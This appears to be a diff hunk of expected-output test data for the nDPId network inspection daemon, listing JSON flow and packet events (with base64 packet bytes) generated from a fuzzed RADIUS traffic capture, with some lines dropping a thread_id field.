00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997764910,"flow_last_seen":1528997764910,"flow_idle_time":600000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1528998376770,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":0,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997764910,"flow_last_seen":1528997764910,"flow_idle_time":600000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1528998376770,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":0,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997764910,"flow_last_seen":1528997764910,"flow_idle_time":600000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1528998376770,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":0,"flow_datalink":1,"flow_max_packets":3} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":338,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997764910,"flow_last_seen":1528997764910,"flow_idle_time":600000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"thread_ts_msec":1528998376770,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":0,"flow_datalink":1,"flow_max_packets":3}
00540{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":339,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":179,"pkt_l4_len":0,"thread_ts_msec":1528998557233,"pkt":"ABRP+4rqcNuYVcUnCAAlAAClD1JAAPwRRKvG4hk+CgxAHgcUchAAkYCWC7QAiR2+QwBH7d0zmbIWMmGskGYBNTAzMTE0ODAwNzEzqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00526{"packet_event_id":1,"packet_event_name":"packet","packet_id":339,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":179,"pkt_l4_len":0,"thread_ts_msec":1528998557233,"pkt":"ABRP+4rqcNuYVcUnCAAlAAClD1JAAPwRRKvG4hk+CgxAHgcUchAAkYCWC7QAiR2+QwBH7d0zmbIWMmGskGYBNTAzMTE0ODAwNzEzqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00211{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":339,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528998557316} 00197{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":339,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528998557316}
00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998338382,"flow_last_seen":1528998338382,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.73","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998279797,"flow_last_seen":1528998279797,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.80.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226700,"flow_last_seen":1528998226700,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.66","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00669{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":341,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226700,"flow_last_seen":1528998226700,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998557443,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.66","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
@@ -447,16 +447,16 @@
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576181,"flow_last_seen":1528998576181,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998576181,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1814,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998576181,"flow_last_seen":1528998576181,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528998576181,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1814,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1528998576181,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998576181,"pkt":"ABRP+4rqcNuYVcUnCABFAAClD7RAAPsRRVLG4hk1CgxAHgcWchAAkUUeC7YAjbHF+KxzM1jmiRGRdJnwnSQBNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmFhOTAvYjA6OWY6YmE6NGE6MGU6N2UvMjQzTw4BAAAMFwwAAAwBf\/xQEmpMlHIe9v0pkoCIcMRZLH4="} 00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1528998576181,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528998576181,"pkt":"ABRP+4rqcNuYVcUnCABFAAClD7RAAPsRRVLG4hk1CgxAHgcWchAAkUUeC7YAjbHF+KxzM1jmiRGRdJnwnSQBNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmFhOTAvYjA6OWY6YmE6NGE6MGU6N2UvMjQzTw4BAAAMFwwAAAwBf\/xQEmpMlHIe9v0pkoCIcMRZLH4="}
01328{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1528998576307,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528998576307,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIWVAAP8RAAAKDEAexuIZNXIQBxQClwAAAbcCj0ICRJPAa6Qqmxpo\/C0gFa8aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM3NwZbIqqwAWEwMzExNDgwMDdhMzk0MzA0QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TYjAtOWYtYmEtNGEtMGUtN2UeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwZDQ5MGFhMjI1YiwgNWIyMmFhOTAvYjA6OWQ6YmE6NGE6MGU6N2Uvqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01328{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1528998576307,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"thread_ts_msec":1528998576307,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIWVAAP8RAAAKDEAexuIZNXIQBxQClwAAAbcCj0ICRJPAa6Qqmxpo\/C0gFa8aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM3NwZbIqqwAWEwMzExNDgwMDdhMzk0MzA0QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TYjAtOWYtYmEtNGEtMGUtN2UeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwZDQ5MGFhMjI1YiwgNWIyMmFhOTAvYjA6OWQ6YmE6NGE6MGU6N2Uvqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00578{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":344,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528998576307,"pkt":"ABRP+4rqcNuYVcUnCABFAADAD7hAAfwRRDPG4hk1CgxAHgcUchAArCnlA7cApDiN+d11wTNhp6tcCWDiFuUBNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmFhOTAvYjA6OWY6YmE6NGE6MGU6N2UvMjQzEiIzMjc2NCBTdWJzYydpYmVyIG5vdCBwcm92aXNpb25lZEcHBAEABwBQEmSUFMWhON8\/wqCGcP\/+Ta0="} 00564{"packet_event_id":1,"packet_event_name":"packet","packet_id":344,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528998576307,"pkt":"ABRP+4rqcNuYVcUnCABFAADAD7hAAfwRRDPG4hk1CgxAHgcUchAArCnlA7cApDiN+d11wTNhp6tcCWDiFuUBNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmFhOTAvYjA6OWY6YmE6NGE6MGU6N2UvMjQzEiIzMjc2NCBTdWJzYydpYmVyIG5vdCBwcm92aXNpb25lZEcHBAEABwBQEmSUFMWhON8\/wqCGcP\/+Ta0="}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":344,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172,"global_ts_msec":1528998576381} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":344,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172,"global_ts_msec":1528998576381}
00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998584808,"flow_last_seen":1528998584808,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998584808,"l3_proto":"ip4","src_ip":"57.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":28948,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998584808,"flow_last_seen":1528998584808,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998584808,"l3_proto":"ip4","src_ip":"57.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":28948,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1528998584808,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998584808,"pkt":"AAAMB6xAABRP+4rqCABFAALbIWZAAP8RAO05DEAexuIZNXIQcRQCxwAAAbgCv9zxrJZG2dsJ+s9nZZp6aFsaCgAAV8gOBFVTGgwAAFfIDQYlAGZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM4NwZbIqq4ATUwMzExNDgwMjUwODY0NjI4AXdsYW4ubW5jNDgwDm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TMDAtNTYtY2QtNmQtNDItNTkeJTZjLWIyLWFlLThlLTMxLTgwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPbEwZmYxMGFjMDAwMDAwY2M3OGE4MjI1YiwgNWIyMmE4NzgvMDA6NTY6Y2Q6NmQ6NDI6NTkvMjM1BAasFAEQIKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1528998584808,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998584808,"pkt":"AAAMB6xAABRP+4rqCABFAALbIWZAAP8RAO05DEAexuIZNXIQcRQCxwAAAbgCv9zxrJZG2dsJ+s9nZZp6aFsaCgAAV8gOBFVTGgwAAFfIDQYlAGZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM4NwZbIqq4ATUwMzExNDgwMjUwODY0NjI4AXdsYW4ubW5jNDgwDm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TMDAtNTYtY2QtNmQtNDItNTkeJTZjLWIyLWFlLThlLTMxLTgwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPbEwZmYxMGFjMDAwMDAwY2M3OGE4MjI1YiwgNWIyMmE4NzgvMDA6NTY6Y2Q6NmQ6NDI6NTkvMjM1BAasFAEQIKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998585019,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998585019,"flow_last_seen":1528998585019,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998585019,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":22544,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1528998585019,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998585019,"pkt":"ABRP+4rqcNuYVcUnCABFAADhD9lAAPwRdvHG4hk1CgxAHgcUWBAAzQh\/C7gAxWTiZLZdO+cme7xhCKfM6MYBNTAzMTE0ODAyNTA4NjQ2MjhAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE4NzgvMDA6NTY6Y2Q6d2Q6NDI6NTkvMjM1T0oBAgBIFwEAAAEFAADyCxcI7XkaT0UFvUk8tJ2YAgUAAMJakSoc8QAAT38LtnrvLnGLAQACCwUAADQNzAWg+MfiRgxSS6PGeYdQEs5faleq8GPWzRgEVPv2RUo="} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1528998585019,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998585019,"pkt":"ABRP+4rqcNuYVcUnCABFAADhD9lAAPwRdvHG4hk1CgxAHgcUWBAAzQh\/C7gAxWTiZLZdO+cme7xhCKfM6MYBNTAzMTE0ODAyNTA4NjQ2MjhAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE4NzgvMDA6NTY6Y2Q6d2Q6NDI6NTkvMjM1T0oBAgBIFwEAAAEFAADyCxcI7XkaT0UFvUk8tJ2YAgUAAMJakSoc8QAAT38LtnrvLnGLAQACCwUAADQNzAWg+MfiRgxSS6PGeYdQEs5faleq8GPWzRgEVPv2RUo="}
